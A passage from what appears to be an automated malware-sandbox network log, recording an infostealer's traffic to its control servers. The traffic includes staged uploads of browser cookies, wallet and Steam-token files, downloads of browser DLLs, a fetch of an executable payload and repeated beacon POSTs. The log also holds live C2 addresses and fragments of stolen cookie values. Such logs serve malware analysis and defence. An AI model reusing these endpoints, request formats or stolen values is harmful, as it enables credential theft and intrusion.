6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 48 43 41 41 45 47 49 4a 4b 45 47 48 49 44 47 43 42 41 45 42 2d 2d 0d 0a Data Ascii: ------HCAAEGIJKEGHIDGCBAEBContent-Disposition: form-data; name="token"ecb877a6bb37dc847102d5abef9cc8fc21df39b4cce0f6b2dbbeffb49235c7bb9ea37a51------HCAAEGIJKEGHIDGCBAEBContent-Disposition: form-data; name="message"browsers------HCAAEGIJKEGHIDGCBAEB--
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DAEGIDHDHIDGIEBGIJEHHost: 85.28.47.4Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 41 45 47 49 44 48 44 48 49 44 47 49 45 42 47 49 4a 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 63 62 38 37 37 61 36 62 62 33 37 64 63 38 34 37 31 30 32 64 35 61 62 65 66 39 63 63 38 66 63 32 31 64 66 33 39 62 34 63 63 65 30 66 36 62 32 64 62 62 65 66 66 62 34 39 32 33 35 63 37 62 62 39 65 61 33 37 61 35 31 0d 0a 2d 2d 2d 2d 2d 2d 44 41 45 47 49 44 48 44 48 49 44 47 49 45 42 47 49 4a 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 44 41 45 47 49 44 48 44 48 49 44 47 49 45 42 47 49 4a 45 48 2d 2d 0d 0a Data Ascii: ------DAEGIDHDHIDGIEBGIJEHContent-Disposition: form-data; name="token"ecb877a6bb37dc847102d5abef9cc8fc21df39b4cce0f6b2dbbeffb49235c7bb9ea37a51------DAEGIDHDHIDGIEBGIJEHContent-Disposition: form-data; name="message"plugins------DAEGIDHDHIDGIEBGIJEH--
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CFIEHCFIECBGCBFHIJJKHost: 85.28.47.4Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 46 49 45 48 43 46 49 45 43 42 47 43 42 46 48 49 4a 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 63 62 38 37 37 61 36 62 62 33 37 64 63 38 34 37 31 30 32 64 35 61 62 65 66 39 63 63 38 66 63 32 31 64 66 33 39 62 34 63 63 65 30 66 36 62 32 64 62 62 65 66 66 62 34 39 32 33 35 63 37 62 62 39 65 61 33 37 61 35 31 0d 0a 2d 2d 2d 2d 2d 2d 43 46 49 45 48 43 46 49 45 43 42 47 43 42 46 48 49 4a 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 43 46 49 45 48 43 46 49 45 43 42 47 43 42 46 48 49 4a 4a 4b 2d 2d 0d 0a Data Ascii: ------CFIEHCFIECBGCBFHIJJKContent-Disposition: form-data; name="token"ecb877a6bb37dc847102d5abef9cc8fc21df39b4cce0f6b2dbbeffb49235c7bb9ea37a51------CFIEHCFIECBGCBFHIJJKContent-Disposition: form-data; name="message"fplugins------CFIEHCFIECBGCBFHIJJK--
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HIJJEGDBFIIDGCAKJEBKHost: 85.28.47.4Content-Length: 7343Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /69934896f997d5bb/sqlite3.dll HTTP/1.1Host: 85.28.47.4Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HCAAEGIJKEGHIDGCBAEBHost: 85.28.47.4Content-Length: 751Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 43 41 41 45 47 49 4a 4b 45 47 48 49 44 47 43 42 41 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 63 62 38 37 37 61 36 62 62 33 37 64 63 38 34 37 31 30 32 64 35 61 62 65 66 39 63 63 38 66 63 32 31 64 66 33 39 62 34 63 63 65 30 66 36 62 32 64 62 62 65 66 66 62 34 39 32 33 35 63 37 62 62 39 65 61 33 37 61 35 31 0d 0a 2d 2d 2d 2d 2d 2d 48 43 41 41 45 47 49 4a 4b 45 47 48 49 44 47 43 42 41 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 59 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 30 52 6c 5a 6d 46 31 62 48 51 75 64 48 68 30 0d 0a 2d 2d 2d 2d 2d 2d 48 43 41 41 45 47 49 4a 4b 45 47 48 49 44 47 43 42 41 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 4c 6d 64 76 62 32 64 73 5a 53 35 6a 62 32 30 4a 56 46 4a 56 52 51 6b 76 43 55 5a 42 54 46 4e 46 43 54 45 32 4f 54 6b 77 4d 54 45 32 4d 54 55 4a 4d 56 42 66 53 6b 46 53 43 54 49 77 4d 6a 4d 74 4d 54 41 74 4d 44 51 74 4d 54 4d 4b 4c 6d 64 76 62 32 64 73 5a 53 35 6a 62 32 30 4a 52 6b 46 4d 55 30 55 4a 4c 77 6c 47 51 55 78 54 52 51 6b 78 4e 7a 45 79 4d 6a 4d 77 4f 44 45 31 43 55 35 4a 52 41 6b 31 4d 54 45 39 52 57 59 31 64 6c 42 47 52 33 63 74 54 56 70 5a 62 7a 56 6f 64 32 55 74 4d 46 52 6f 51 56 5a 7a 62 47 4a 34 59 6d 31 32 5a 46 5a 61 64 32 4e 49 62 6e 46 57 65 6c 64 49 51 56 55 78 4e 48 59 31 4d 30 31 4f 4d 56 5a 32 64 33 5a 52 63 54 68 69 59 56 6c 6d 5a 7a 49 74 53 55 46 30 63 56 70 43 56 6a 56 4f 54 30 77 31 63 6e 5a 71 4d 6b 35 58 53 58 46 79 65 6a 4d 33 4e 31 56 6f 54 47 52 49 64 45 39 6e 52 53 31 30 53 6d 46 43 62 46 56 43 57 55 70 46 61 48 56 48 63 31 46 6b 63 57 35 70 4d 32 39 55 53 6d 63 77 59 6e 4a 78 64 6a 46 6b 61 6d 52 70 54 45 70 35 64 6c 52 54 56 57 68 6b 53 79 31 6a 4e 55 70 58 59 57 52 44 55 33 4e 56 54 46 42 4d 65 6d 68 54 65 43 31 47 4c 54 5a 33 54 32 63 30 43 67 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 48 43 41 41 45 47 49 4a 4b 45 47 48 49 44 47 43 42 41 45 42 2d 2d 0d 0a Data Ascii: ------HCAAEGIJKEGHIDGCBAEBContent-Disposition: form-data; name="token"ecb877a6bb37dc847102d5abef9cc8fc21df39b4cce0f6b2dbbeffb49235c7bb9ea37a51------HCAAEGIJKEGHIDGCBAEBContent-Disposition: form-data; name="file_name"Y29va2llc1xHb29nbGUgQ2hyb21lX0RlZmF1bHQudHh0------HCAAEGIJKEGHIDGCBAEBContent-Disposition: form-data; name="file"Lmdvb2dsZS5jb20JVFJVRQkvCUZBTFNFCTE2OTkwMTE2MTUJMVBfSkFSCTIwMjMtMTAtMDQtMTMKLmdvb2dsZS5jb20JRkFMU0UJLwlGQUxTRQkxNzEyMjMwODE1CU5JRAk1MTE9RWY1dlBGR3ctTVpZbzVod2UtMFRoQVZzbGJ4Ym12Z
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CBKJJJDHDGDAAKECAKJDHost: 85.28.47.4Content-Length: 359Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 42 4b 4a 4a 4a 44 48 44 47 44 41 41 4b 45 43 41 4b 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 63 62 38 37 37 61 36 62 62 33 37 64 63 38 34 37 31 30 32 64 35 61 62 65 66 39 63 63 38 66 63 32 31 64 66 33 39 62 34 63 63 65 30 66 36 62 32 64 62 62 65 66 66 62 34 39 32 33 35 63 37 62 62 39 65 61 33 37 61 35 31 0d 0a 2d 2d 2d 2d 2d 2d 43 42 4b 4a 4a 4a 44 48 44 47 44 41 41 4b 45 43 41 4b 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 5a 57 6c 74 5a 57 68 79 64 6e 70 76 5a 43 35 6d 61 57 78 6c 0d 0a 2d 2d 2d 2d 2d 2d 43 42 4b 4a 4a 4a 44 48 44 47 44 41 41 4b 45 43 41 4b 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 43 42 4b 4a 4a 4a 44 48 44 47 44 41 41 4b 45 43 41 4b 4a 44 2d 2d 0d 0a Data Ascii: ------CBKJJJDHDGDAAKECAKJDContent-Disposition: form-data; name="token"ecb877a6bb37dc847102d5abef9cc8fc21df39b4cce0f6b2dbbeffb49235c7bb9ea37a51------CBKJJJDHDGDAAKECAKJDContent-Disposition: form-data; name="file_name"ZWltZWhydnpvZC5maWxl------CBKJJJDHDGDAAKECAKJDContent-Disposition: form-data; name="file"------CBKJJJDHDGDAAKECAKJD--
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FBGHCGCAEBFIJKFIDBGHHost: 85.28.47.4Content-Length: 359Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 42 47 48 43 47 43 41 45 42 46 49 4a 4b 46 49 44 42 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 63 62 38 37 37 61 36 62 62 33 37 64 63 38 34 37 31 30 32 64 35 61 62 65 66 39 63 63 38 66 63 32 31 64 66 33 39 62 34 63 63 65 30 66 36 62 32 64 62 62 65 66 66 62 34 39 32 33 35 63 37 62 62 39 65 61 33 37 61 35 31 0d 0a 2d 2d 2d 2d 2d 2d 46 42 47 48 43 47 43 41 45 42 46 49 4a 4b 46 49 44 42 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 5a 57 6c 74 5a 57 68 79 64 6e 70 76 5a 43 35 6d 61 57 78 6c 0d 0a 2d 2d 2d 2d 2d 2d 46 42 47 48 43 47 43 41 45 42 46 49 4a 4b 46 49 44 42 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 46 42 47 48 43 47 43 41 45 42 46 49 4a 4b 46 49 44 42 47 48 2d 2d 0d 0a Data Ascii: ------FBGHCGCAEBFIJKFIDBGHContent-Disposition: form-data; name="token"ecb877a6bb37dc847102d5abef9cc8fc21df39b4cce0f6b2dbbeffb49235c7bb9ea37a51------FBGHCGCAEBFIJKFIDBGHContent-Disposition: form-data; name="file_name"ZWltZWhydnpvZC5maWxl------FBGHCGCAEBFIJKFIDBGHContent-Disposition: form-data; name="file"------FBGHCGCAEBFIJKFIDBGH--
Source: global traffic HTTP traffic detected: GET /69934896f997d5bb/freebl3.dll HTTP/1.1Host: 85.28.47.4Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /69934896f997d5bb/mozglue.dll HTTP/1.1Host: 85.28.47.4Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /69934896f997d5bb/msvcp140.dll HTTP/1.1Host: 85.28.47.4Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /69934896f997d5bb/nss3.dll HTTP/1.1Host: 85.28.47.4Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /69934896f997d5bb/softokn3.dll HTTP/1.1Host: 85.28.47.4Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /69934896f997d5bb/vcruntime140.dll HTTP/1.1Host: 85.28.47.4Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IDGDAAKFHIEHIECAFBAAHost: 85.28.47.4Content-Length: 1067Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HDAFBAEBKJKFIDHJJKJKHost: 85.28.47.4Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 44 41 46 42 41 45 42 4b 4a 4b 46 49 44 48 4a 4a 4b 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 63 62 38 37 37 61 36 62 62 33 37 64 63 38 34 37 31 30 32 64 35 61 62 65 66 39 63 63 38 66 63 32 31 64 66 33 39 62 34 63 63 65 30 66 36 62 32 64 62 62 65 66 66 62 34 39 32 33 35 63 37 62 62 39 65 61 33 37 61 35 31 0d 0a 2d 2d 2d 2d 2d 2d 48 44 41 46 42 41 45 42 4b 4a 4b 46 49 44 48 4a 4a 4b 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 48 44 41 46 42 41 45 42 4b 4a 4b 46 49 44 48 4a 4a 4b 4a 4b 2d 2d 0d 0a Data Ascii: ------HDAFBAEBKJKFIDHJJKJKContent-Disposition: form-data; name="token"ecb877a6bb37dc847102d5abef9cc8fc21df39b4cce0f6b2dbbeffb49235c7bb9ea37a51------HDAFBAEBKJKFIDHJJKJKContent-Disposition: form-data; name="message"wallets------HDAFBAEBKJKFIDHJJKJK--
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CFCBFBGDBKJKECAAKKFHHost: 85.28.47.4Content-Length: 265Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 46 43 42 46 42 47 44 42 4b 4a 4b 45 43 41 41 4b 4b 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 63 62 38 37 37 61 36 62 62 33 37 64 63 38 34 37 31 30 32 64 35 61 62 65 66 39 63 63 38 66 63 32 31 64 66 33 39 62 34 63 63 65 30 66 36 62 32 64 62 62 65 66 66 62 34 39 32 33 35 63 37 62 62 39 65 61 33 37 61 35 31 0d 0a 2d 2d 2d 2d 2d 2d 43 46 43 42 46 42 47 44 42 4b 4a 4b 45 43 41 41 4b 4b 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 43 46 43 42 46 42 47 44 42 4b 4a 4b 45 43 41 41 4b 4b 46 48 2d 2d 0d 0a Data Ascii: ------CFCBFBGDBKJKECAAKKFHContent-Disposition: form-data; name="token"ecb877a6bb37dc847102d5abef9cc8fc21df39b4cce0f6b2dbbeffb49235c7bb9ea37a51------CFCBFBGDBKJKECAAKKFHContent-Disposition: form-data; name="message"files------CFCBFBGDBKJKECAAKKFH--
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KFCGDBAKKKFBGDHJKFHJHost: 85.28.47.4Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 46 43 47 44 42 41 4b 4b 4b 46 42 47 44 48 4a 4b 46 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 63 62 38 37 37 61 36 62 62 33 37 64 63 38 34 37 31 30 32 64 35 61 62 65 66 39 63 63 38 66 63 32 31 64 66 33 39 62 34 63 63 65 30 66 36 62 32 64 62 62 65 66 66 62 34 39 32 33 35 63 37 62 62 39 65 61 33 37 61 35 31 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 43 47 44 42 41 4b 4b 4b 46 42 47 44 48 4a 4b 46 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 43 47 44 42 41 4b 4b 4b 46 42 47 44 48 4a 4b 46 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 43 47 44 42 41 4b 4b 4b 46 42 47 44 48 4a 4b 46 48 4a 2d 2d 0d 0a Data Ascii: ------KFCGDBAKKKFBGDHJKFHJContent-Disposition: form-data; name="token"ecb877a6bb37dc847102d5abef9cc8fc21df39b4cce0f6b2dbbeffb49235c7bb9ea37a51------KFCGDBAKKKFBGDHJKFHJContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------KFCGDBAKKKFBGDHJKFHJContent-Disposition: form-data; name="file"------KFCGDBAKKKFBGDHJKFHJ--
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IDHIEBAAKJDHIECAAFHCHost: 85.28.47.4Content-Length: 270Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 44 48 49 45 42 41 41 4b 4a 44 48 49 45 43 41 41 46 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 63 62 38 37 37 61 36 62 62 33 37 64 63 38 34 37 31 30 32 64 35 61 62 65 66 39 63 63 38 66 63 32 31 64 66 33 39 62 34 63 63 65 30 66 36 62 32 64 62 62 65 66 66 62 34 39 32 33 35 63 37 62 62 39 65 61 33 37 61 35 31 0d 0a 2d 2d 2d 2d 2d 2d 49 44 48 49 45 42 41 41 4b 4a 44 48 49 45 43 41 41 46 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 6a 62 64 74 61 69 6a 6f 76 67 0d 0a 2d 2d 2d 2d 2d 2d 49 44 48 49 45 42 41 41 4b 4a 44 48 49 45 43 41 41 46 48 43 2d 2d 0d 0a Data Ascii: ------IDHIEBAAKJDHIECAAFHCContent-Disposition: form-data; name="token"ecb877a6bb37dc847102d5abef9cc8fc21df39b4cce0f6b2dbbeffb49235c7bb9ea37a51------IDHIEBAAKJDHIECAAFHCContent-Disposition: form-data; name="message"jbdtaijovg------IDHIEBAAKJDHIECAAFHC--
Source: global traffic HTTP traffic detected: GET /mine/amadka.exe HTTP/1.1Host: 77.91.77.81Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /ku4Nor9/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 147.45.47.155Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /ku4Nor9/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 147.45.47.155Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 41 38 30 42 34 45 46 41 38 45 34 43 45 32 39 43 35 31 35 31 43 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 32 32 39 37 39 42 33 35 31 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58A80B4EFA8E4CE29C5151CB140BE1D46450FC9DDF642E3BDD70A7FB22979B35182D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /ku4Nor9/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 147.45.47.155Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /ku4Nor9/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 147.45.47.155Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 41 38 30 42 34 45 46 41 38 45 34 43 45 32 39 43 35 31 35 31 43 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 32 32 39 37 39 42 33 35 31 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58A80B4EFA8E4CE29C5151CB140BE1D46450FC9DDF642E3BDD70A7FB22979B35182D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /ku4Nor9/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 147.45.47.155Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /ku4Nor9/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 147.45.47.155Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 41 38 30 42 34 45 46 41 38 45 34 43 45 32 39 43 35 31 35 31 43 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 32 32 39 37 39 42 33 35 31 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58A80B4EFA8E4CE29C5151CB140BE1D46450FC9DDF642E3BDD70A7FB22979B35182D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /ku4Nor9/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 147.45.47.155Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /ku4Nor9/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 147.45.47.155Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 41 38 30 42 34 45 46 41 38 45 34 43 45 32 39 43 35 31 35 31 43 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 32 32 39 37 39 42 33 35 31 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58A80B4EFA8E4CE29C5151CB140BE1D46450FC9DDF642E3BDD70A7FB22979B35182D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /ku4Nor9/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 147.45.47.155Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /ku4Nor9/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 147.45.47.155Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 41 38 30 42 34 45 46 41 38 45 34 43 45 32 39 43 35 31 35 31 43 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 32 32 39 37 39 42 33 35 31 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58A80B4EFA8E4CE29C5151CB140BE1D46450FC9DDF642E3BDD70A7FB22979B35182D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /ku4Nor9/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 147.45.47.155Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
